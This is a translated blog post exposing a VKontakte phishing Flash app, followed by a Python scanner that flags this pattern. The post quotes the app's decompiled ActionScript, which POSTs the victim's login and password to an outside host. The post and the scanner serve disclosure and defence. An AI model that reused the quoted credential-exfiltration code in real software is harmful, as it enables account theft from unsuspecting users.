
Passwords of careless users are being stolen on VKontakte again

Today I received a message from one of my friends, the text read:

Hi, Denis. Check out this chat on VKontakte - vkontakte.ru/apps.php?act=s&id=236634& ... More quickly, I was very different! Tons of impressions, it is full-unavailable)))

The message would have gone into the trash, but the last sentence alarmed me - people just don't write like that.
I decided to see what kind of fruit this was ...

I followed the link and saw an ordinary Flash application; it looked like this:


After any data is entered, the form displays a message saying that the chat is overloaded.
Naturally, I became curious about what it actually does, so I downloaded the SWF file itself and fed it to Swf Decompiler. After decompiling, it turned out that the passwords and email addresses are sent by POST to http://ckrack.peoplego.ru/save.php:

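    // Decompiled ActionScript 2 from the SWF
    var my_lv = new LoadVars();      // carries the form data out
    var result_lv = new LoadVars();  // receives the server's reply
    // Copy whatever was typed into the login and password fields
    my_lv.login_v = _root.login_txt.text;
    my_lv.password_v = _root.password_txt.text;
    // POST both values to the third-party host
    my_lv.sendAndLoad("http://ckrack.peoplego.ru/save.php", result_lv, "POST");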

The careless programmer who wrote this Flash app didn't even bother to add a validity check for the email address. Apparently, he was busy writing the malware that invites people to this very “chat”.
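
The pattern in the decompiled code above (form inputs copied into a LoadVars object and POSTed to a host outside the platform) can be checked for mechanically. The following is an added example, not part of the original post: a small Python scanner over decompiled ActionScript 2, where the function names and the choice of vkontakte.ru as the trusted domain are assumptions.

```python
import re
from urllib.parse import urlsplit

# Constructed sample: the decompiled ActionScript 2 quoted in the post.
SAMPLE_AS = '''
var my_lv = new LoadVars();
var result_lv = new LoadVars();
my_lv.login_v = _root.login_txt.text;
my_lv.password_v = _root.password_txt.text;
my_lv.sendAndLoad("http://ckrack.peoplego.ru/save.php", result_lv, "POST");
'''

# obj.field = <path>.<input>.text;  -> a form input copied into an object
ASSIGN_RE = re.compile(r'(\w+)\.(\w+)\s*=\s*[\w.]*?(\w+)\.text\s*;')
# obj.send("url", ...) or obj.sendAndLoad("url", ...)
SEND_RE = re.compile(r'(\w+)\.(send|sendAndLoad)\s*\(\s*"([^"]*)"')
# Field or input names that suggest credentials (heuristic, an assumption)
SENSITIVE_RE = re.compile(r'pass|pwd|login|mail', re.I)

def host_of(url):
    """Host of a URL literal; tolerates padding and a missing scheme."""
    url = url.strip()
    if '://' not in url:
        url = 'http://' + url
    return (urlsplit(url).hostname or '').lower()

def is_trusted(host, trusted_domains):
    """True only for the trusted domain itself or a real subdomain of it."""
    return any(host == d or host.endswith('.' + d) for d in trusted_domains)

def find_credential_exfil(source, trusted_domains):
    """Report send calls that carry credential inputs to an untrusted host."""
    carried = {}  # variable name -> fields filled from credential inputs
    for obj, field, widget in ASSIGN_RE.findall(source):
        if SENSITIVE_RE.search(field) or SENSITIVE_RE.search(widget):
            carried.setdefault(obj, []).append(field)
    findings = []
    for obj, method, url in SEND_RE.findall(source):
        host = host_of(url)
        if obj in carried and not is_trusted(host, trusted_domains):
            findings.append({'object': obj, 'method': method,
                             'host': host, 'fields': carried[obj]})
    return findings

if __name__ == '__main__':
    # 'vkontakte.ru' as the only trusted domain is an assumption
    for finding in find_credential_exfil(SAMPLE_AS, ['vkontakte.ru']):
        print(finding)
```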

PS: Passwords have been stolen, are being stolen, and will be stolen, but one thing surprises me: do people really think others are so stupid when they make such pathetic attempts to steal passwords?

Source: https://habr.com/ru/post/37695/

